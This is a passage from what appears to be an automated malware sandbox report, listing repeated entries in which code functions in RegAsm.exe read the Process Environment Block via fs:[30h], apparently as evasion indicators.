                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC437C mov eax, dword ptr fs:[00000030h]5_2_02BC437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF367 mov eax, dword ptr fs:[00000030h]5_2_02BDF367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19353 mov eax, dword ptr fs:[00000030h]5_2_02B19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19353 mov eax, dword ptr fs:[00000030h]5_2_02B19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov ecx, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEA352 mov eax, dword ptr fs:[00000030h]5_2_02BEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D34C mov eax, dword ptr fs:[00000030h]5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D34C mov eax, dword ptr fs:[00000030h]5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5341 mov eax, dword ptr fs:[00000030h]5_2_02BF5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE60B8 mov eax, dword ptr fs:[00000030h]5_2_02BE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE60B8 mov ecx, dword ptr fs:[00000030h]5_2_02BE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB80A8 mov eax, dword ptr fs:[00000030h]5_2_02BB80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B25096 mov eax, dword ptr fs:[00000030h]5_2_02B25096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D090 mov eax, dword ptr fs:[00000030h]5_2_02B4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D090 mov eax, dword ptr fs:[00000030h]5_2_02B4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5909C mov eax, dword ptr fs:[00000030h]5_2_02B5909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2208A mov eax, dword ptr fs:[00000030h]5_2_02B2208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D08D mov eax, dword ptr fs:[00000030h]5_2_02B1D08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C0F0 mov eax, dword ptr fs:[00000030h]5_2_02B1C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B620F0 mov ecx, dword ptr fs:[00000030h]5_2_02B620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B450E4 mov eax, dword ptr fs:[00000030h]5_2_02B450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B450E4 mov ecx, dword ptr fs:[00000030h]5_2_02B450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A0E3 mov ecx, dword ptr fs:[00000030h]5_2_02B1A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA60E0 mov eax, dword ptr fs:[00000030h]5_2_02BA60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B280E9 mov eax, dword ptr fs:[00000030h]5_2_02B280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA20DE mov eax, dword ptr fs:[00000030h]5_2_02BA20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF50D9 mov eax, dword ptr fs:[00000030h]5_2_02BF50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B490DB mov eax, dword ptr fs:[00000030h]5_2_02B490DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D0C0 mov eax, dword ptr fs:[00000030h]5_2_02B9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D0C0 mov eax, dword ptr fs:[00000030h]5_2_02B9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A020 mov eax, dword ptr fs:[00000030h]5_2_02B1A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C020 mov eax, dword ptr fs:[00000030h]5_2_02B1C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA4000 mov ecx, dword ptr fs:[00000030h]5_2_02BA4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov ecx, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4C073 mov eax, dword ptr fs:[00000030h]5_2_02B4C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D070 mov ecx, dword ptr fs:[00000030h]5_2_02B9D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA106E mov eax, dword ptr fs:[00000030h]5_2_02BA106E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5060 mov eax, dword ptr fs:[00000030h]5_2_02BF5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B22050 mov eax, dword ptr fs:[00000030h]5_2_02B22050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC705E mov ebx, dword ptr fs:[00000030h]5_2_02BC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC705E mov eax, dword ptr fs:[00000030h]5_2_02BC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B052 mov eax, dword ptr fs:[00000030h]5_2_02B4B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA6050 mov eax, dword ptr fs:[00000030h]5_2_02BA6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3B1B0 mov eax, dword ptr fs:[00000030h]5_2_02B3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B77190 mov eax, dword ptr fs:[00000030h]5_2_02B77190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B60185 mov eax, dword ptr fs:[00000030h]5_2_02B60185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC188 mov eax, dword ptr fs:[00000030h]5_2_02BDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC188 mov eax, dword ptr fs:[00000030h]5_2_02BDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC71F9 mov esi, dword ptr fs:[00000030h]5_2_02BC71F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B501F8 mov eax, dword ptr fs:[00000030h]5_2_02B501F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF61E5 mov eax, dword ptr fs:[00000030h]5_2_02BF61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B251ED mov eax, dword ptr fs:[00000030h]5_2_02B251ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5D1D0 mov eax, dword ptr fs:[00000030h]5_2_02B5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5D1D0 mov ecx, dword ptr fs:[00000030h]5_2_02B5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov ecx, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF51CB mov eax, dword ptr fs:[00000030h]5_2_02BF51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE61C3 mov eax, dword ptr fs:[00000030h]5_2_02BE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE61C3 mov eax, dword ptr fs:[00000030h]5_2_02BE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B21131 mov eax, dword ptr fs:[00000030h]5_2_02B21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B21131 mov eax, dword ptr fs:[00000030h]5_2_02B21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B50124 mov eax, dword ptr fs:[00000030h]5_2_02B50124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov ecx, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE0115 mov eax, dword ptr fs:[00000030h]5_2_02BE0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB9179 mov eax, dword ptr fs:[00000030h]5_2_02BB9179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
